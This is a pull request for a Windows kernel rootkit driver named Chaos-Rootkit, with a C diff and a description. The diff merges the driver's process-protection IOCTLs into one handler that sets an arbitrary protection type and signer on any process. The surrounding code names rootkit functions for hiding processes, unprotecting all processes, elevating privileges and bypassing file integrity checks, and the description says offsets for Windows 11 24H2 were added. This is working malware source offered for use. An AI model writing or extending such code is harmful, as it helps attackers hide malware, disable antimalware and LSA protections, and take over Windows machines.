### PR TITLE
Add Process Protection in GUI and Windows 11 24H2 Offsets

### DIFF
--- a/Chaos-Rootkit/Driver.c
+++ b/Chaos-Rootkit/Driver.c
@@ -308,7 +308,7 @@ NTSTATUS processIoctlRequest(
         // if system offsets not supported / disable features 
         // that require the use of offsets to avoid crash
         if (pstack->Parameters.DeviceIoControl.IoControlCode >= HIDE_PROC && \
-            pstack->Parameters.DeviceIoControl.IoControlCode <= UNPROTECT_ALL_PROCESSES && xHooklist.check_off)
+            pstack->Parameters.DeviceIoControl.IoControlCode <= CR_SET_PROTECTION_LEVEL_CTL && xHooklist.check_off)
         {
             pstatus = ERROR_UNSUPPORTED_OFFSET;
             __leave;
@@ -346,92 +346,20 @@ NTSTATUS processIoctlRequest(
 
             break;
         }
-        case PROTECTION_LEVEL_SYSTEM:
+        case CR_SET_PROTECTION_LEVEL_CTL:
         {
             if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
             {
                 pstatus = STATUS_BUFFER_TOO_SMALL;
                 break;
             }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
 
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_SYSTEM);
+            PCR_SET_PROTECTION_LEVEL Args = Irp->AssociatedIrp.SystemBuffer;
 
-            DbgPrint("Process Protection changed to WinSystem");
-            break;
+            pstatus = ChangeProtectionLevel(Args);
 
-        }
-        case PROTECTION_LEVEL_WINTCB:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_WINTCB);
-
-            DbgPrint("Process Protection changed to WinTcb");
             break;
         }
-        case PROTECTION_LEVEL_WINDOWS:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_WINDOWS);
-
-            DbgPrint("Process Protection changed to Windows");
-            break;
-        }
-        case PROTECTION_LEVEL_AUTHENTICODE:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_AUTHENTICODE);
-
-            DbgPrint("Process Protection changed to Authenticode ");
-            break;
-        }
-        case PROTECTION_LEVEL_WINTCB_LIGHT:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_WINTCB_LIGHT);
-
-            DbgPrint("Process Protection changed to WinTcb ");
-            break;
-        }
-        case PROTECTION_LEVEL_WINDOWS_LIGHT:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_WINDOWS_LIGHT);
-
-            DbgPrint("Process Protection changed to Windows ");
-            break;
-        }
-
         case RESTRICT_ACCESS_TO_FILE_CTL:
         {
             if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(fopera))
@@ -460,48 +388,7 @@ NTSTATUS processIoctlRequest(
             DbgPrint("bypass integrity check ");
             break;
         }
-        case PROTECTION_LEVEL_LSA_LIGHT:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_LSA_LIGHT);
-
-            DbgPrint("Process Protection changed to Lsa");
-            break;
-        }
-        case PROTECTION_LEVEL_ANTIMALWARE_LIGHT:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_ANTIMALWARE_LIGHT);
-
-            DbgPrint("Process Protection changed to Antimalware ");
-            break;
-        }
-        case PROTECTION_LEVEL_AUTHENTICODE_LIGHT:
-        {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
-            {
-                pstatus = STATUS_BUFFER_TOO_SMALL;
-                break;
-            }
-            RtlCopyMemory(&inputInt, Irp->AssociatedIrp.SystemBuffer, sizeof(inputInt));
-
-            pstatus = ChangeProtectionLevel(inputInt, global_protection_levels.PS_PROTECTED_AUTHENTICODE_LIGHT);
-
-            DbgPrint("Process Protection changed to Authenticode ");
-            break;
-        }
+       
         case UNPROTECT_ALL_PROCESSES:
         {
             pstatus = UnprotectAllProcesses();

--- a/Chaos-Rootkit/Driver.c
+++ b/Chaos-Rootkit/Driver.c
@@ -348,7 +348,7 @@ NTSTATUS processIoctlRequest(
         }
         case CR_SET_PROTECTION_LEVEL_CTL:
         {
-            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(int))
+            if (pstack->Parameters.DeviceIoControl.InputBufferLength < sizeof(CR_SET_PROTECTION_LEVEL))
             {
                 pstatus = STATUS_BUFFER_TOO_SMALL;
                 break;
@@ -560,3 +560,4 @@ DriverEntry(
 
     return (STATUS_SUCCESS);
 }
+

--- a/Chaos-Rootkit/header.h
+++ b/Chaos-Rootkit/header.h
@@ -27,8 +27,30 @@
 #define BYPASS_INTEGRITY_FILE_CTL               CTL_CODE(FILE_DEVICE_UNKNOWN, 0x170, METHOD_BUFFERED, FILE_ANY_ACCESS)
 #define ZWSWAPCERT_CTL                          CTL_CODE(FILE_DEVICE_UNKNOWN, 0x171, METHOD_BUFFERED, FILE_ANY_ACCESS)
 
+#define CR_SET_PROTECTION_LEVEL_CTL             CTL_CODE(FILE_DEVICE_UNKNOWN, 0x172, METHOD_BUFFERED, FILE_ANY_ACCESS)
+
 #define STATUS_ALREADY_EXISTS       ((NTSTATUS)0xB7)
 #define ERROR_UNSUPPORTED_OFFSET    ((NTSTATUS)0x00000233)
+
+typedef struct _PS_PROTECTION
+{
+    union
+    {
+        UCHAR Level;
+        struct
+        {
+            UCHAR Type : 3;
+            UCHAR Audit : 1;
+            UCHAR Signer : 4;
+        };
+    };
+} PS_PROTECTION, * PPS_PROTECTION;
+
+/* CR stands for Chaos Rootkit. */
+typedef struct _CR_SET_PROTECTION_LEVEL {
+    PS_PROTECTION Protection;
+    HANDLE Process;
+} CR_SET_PROTECTION_LEVEL, *PCR_SET_PROTECTION_LEVEL;
 
 typedef struct foperationx {
     int rpid;
@@ -91,7 +113,7 @@ DWORD       UnprotectAllProcesses();
 DWORD       HideProcess(int pid);
 DWORD       InitializeOffsets(Phooklist hooklist);
 DWORD       PrivilegeElevationForProcess(int pid);
-DWORD       ChangeProtectionLevel(int pid, BYTE protectionOption);
+NTSTATUS    ChangeProtectionLevel(PCR_SET_PROTECTION_LEVEL ProtectionLevel);
 NTSTATUS    InitializeStructure(Phooklist hooklist_s);
 const char* PsGetProcessImageFileName(PEPROCESS Process);
 


### PR DESCRIPTION
# Enhance Process Protection Feature

## What changed
This feature already existed. But was messy and not utilized in the GUI.
- I organized it in a single IOCTL and gave users flexibility to choose type and signer of the protection level.
- I updated the UI to utilize these changes.
- I also fixed the loadDriver function. In my tests, it wasn't working because it was returning FALSE when it should have returned TRUE, and TRUE on FALSE.
- Added offsets for Windows 11 24H2.

## It looks like this
<img width="391" height="441" alt="ss" src="https://github.com/user-attachments/assets/e76b0996-dba4-4813-8794-8fd035055233" />
